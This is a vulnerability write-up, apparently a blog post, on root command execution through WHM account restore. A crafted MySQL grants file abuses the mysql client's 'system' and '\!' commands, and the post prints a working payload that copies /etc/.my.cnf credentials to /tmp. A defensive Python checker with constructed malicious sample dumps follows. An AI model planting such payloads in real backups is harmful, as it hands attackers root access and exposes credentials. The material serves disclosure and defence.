WHM has a “restore account” feature that restores a full account backup. A normal user can generate such a backup from cPanel, and it contains everything belonging to the account, including the files and the account metadata.
One of the metadata items is the account's MySQL grants, stored as an SQL file inside the backup. When the account is restored through the WHM UI or with the restorepkg command, that MySQL metadata file is fed to the mysql client as the root user.
That may sound harmless, but it is really bad: the mysql command-line client interprets a few commands itself instead of sending them to the server, so an SQL file can carry arbitrary shell commands, and those run with the privileges of whoever invokes the client, here root. Let me show it.
```
root@server1 [/home/prajith]# cat mysql.sql
\! id
root@server1 [/home/prajith]# mysql < mysql.sql
uid=0(root) gid=0(root) groups=0(root)
root@server1 [/home/prajith]#
```
So any Linux command can be placed in the MySQL metadata file, and it is executed as root while the account is being restored.
Here is an example:
```
GRANT USAGE ON *.* TO 'whmtest'@'localhost' IDENTIFIED BY PASSWORD '*A4E12252EACEA5A79<XXXXX>E11D47296FE237D5897'\g
system cat /etc/.my.cnf >> /tmp/test.txt;
GRANT ALL PRIVILEGES ON `whmtest_pop`.* TO 'whmtest'@'localhost';
```
While the account is being restored, the mysql client runs the Linux command through its system command, and the output lands in /tmp/test.txt, which we can read later with an HTTP request. The trick is the `\g` at the end of the first GRANT: it sends that statement to the server and empties the client's statement buffer, so the client sees `system` at the start of the next line, treats it as one of its own commands, and hands the rest of the line to a shell instead of to the server. So don't restore backups from untrusted sources 😀
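Added here as a worked example, not code from the original post or from cPanel: a small pre-restore check over a backup's MySQL grants file. It assumes the grants dump holds one GRANT statement per line, as in the dump above, and flags the mysql client commands that reach the shell or the filesystem (`system`/`\!`, `source`/`\.`, `tee`/`\T`, `edit`/`\e`, `pager`/`\P`), tracking quotes the way the client's own lexer does so that a backslash inside a password hash or identifier is not reported. The three sample dumps at the bottom are constructed for the example, and the hash in them is a placeholder.

```python
"""Pre-restore check for the MySQL grants file in a cPanel account backup.

Added example, not cPanel's code. The mysql(1) client interprets a handful of
commands itself instead of sending them to the server; "system"/"\\!" hands its
argument to /bin/sh as the user running mysql, which during restorepkg is root.
"""
import re

# Backslash short forms of the client commands that reach the shell or the
# filesystem. The client recognises a backslash command anywhere in the input
# as long as it is outside a quoted string, not only at the start of a line.
SHELL_REACHING_SHORT = {
    "!": "system",   # run the rest of the line through /bin/sh
    ".": "source",   # execute another file of SQL (and client commands)
    "T": "tee",      # append all output to a file
    "e": "edit",     # run $EDITOR on the current statement
    "P": "pager",    # pipe all output through a command
}
# The long forms are only honoured when they begin a fresh input line and no
# statement is pending, which is why the attacker ends the preceding GRANT
# with \g before writing "system ...".
SHELL_REACHING_LONG = set(SHELL_REACHING_SHORT.values())

GRANT_RE = re.compile(r"^\s*GRANT\s", re.IGNORECASE)


def find_client_commands(sql_text):
    """Return [(line_no, command, line)] for each shell-reaching client command.

    Quote tracking ('...', "...", `...`) mirrors the client's lexer: inside any
    quoted string a backslash and the character after it are copied verbatim,
    so '*AB\\!CD' is not a finding, while a bare \\! outside quotes is. Comment
    lines are not special-cased; a \\! in a comment is reported too, which errs
    on the side of refusing the restore.
    """
    findings = []
    for line_no, line in enumerate(sql_text.splitlines(), start=1):
        first_word = re.match(r"\s*([A-Za-z]+)", line)
        if first_word and first_word.group(1).lower() in SHELL_REACHING_LONG:
            findings.append((line_no, first_word.group(1).lower(), line))
        quote = None
        i = 0
        while i < len(line):
            ch = line[i]
            if quote:
                if ch == "\\":
                    i += 2          # backslash plus escaped character inside a string
                    continue
                if ch == quote:
                    quote = None
            elif ch in ("'", '"', "`"):
                quote = ch
            elif ch == "\\" and i + 1 < len(line):
                cmd = SHELL_REACHING_SHORT.get(line[i + 1])
                if cmd:
                    findings.append((line_no, cmd, line))
            i += 1
    return findings


def grants_file_is_safe(sql_text):
    """True only if no client command is present and every non-blank line is a GRANT.

    Assumes one statement per line, as in the dump shown above; the grants file
    should contain nothing else, so any other statement is a reason to refuse.
    """
    if find_client_commands(sql_text):
        return False
    return all(GRANT_RE.match(l) for l in sql_text.splitlines() if l.strip())


# Constructed samples for the example (the password hash is a placeholder).
MALICIOUS_DUMP = (
    "GRANT USAGE ON *.* TO 'whmtest'@'localhost' IDENTIFIED BY PASSWORD '*PLACEHOLDERHASH'\\g\n"
    "system cat /etc/.my.cnf >> /tmp/test.txt;\n"
    "GRANT ALL PRIVILEGES ON `whmtest_pop`.* TO 'whmtest'@'localhost';\n"
)
SHORT_FORM_DUMP = (
    "GRANT SELECT ON `acct_db`.* TO 'acct'@'localhost';\n"
    "\\! id > /tmp/whoami.txt\n"
)
BENIGN_DUMP = (
    "GRANT USAGE ON *.* TO 'acct'@'localhost' IDENTIFIED BY PASSWORD '*AB\\!CD';\n"
    "GRANT ALL PRIVILEGES ON `acct_wp`.* TO 'acct'@'localhost';\n"
)

if __name__ == "__main__":
    samples = [("malicious", MALICIOUS_DUMP), ("short form", SHORT_FORM_DUMP), ("benign", BENIGN_DUMP)]
    for name, dump in samples:
        print(name, "safe" if grants_file_is_safe(dump) else "REFUSE")
        for line_no, cmd, line in find_client_commands(dump):
            print("  line %d: client command %r in %r" % (line_no, cmd, line))
```

Refusing the restore is the simple response; the more robust one is to apply the grants through a database driver connection rather than by piping the file into the mysql binary, since a driver sends statement text to the server verbatim and never interprets client commands.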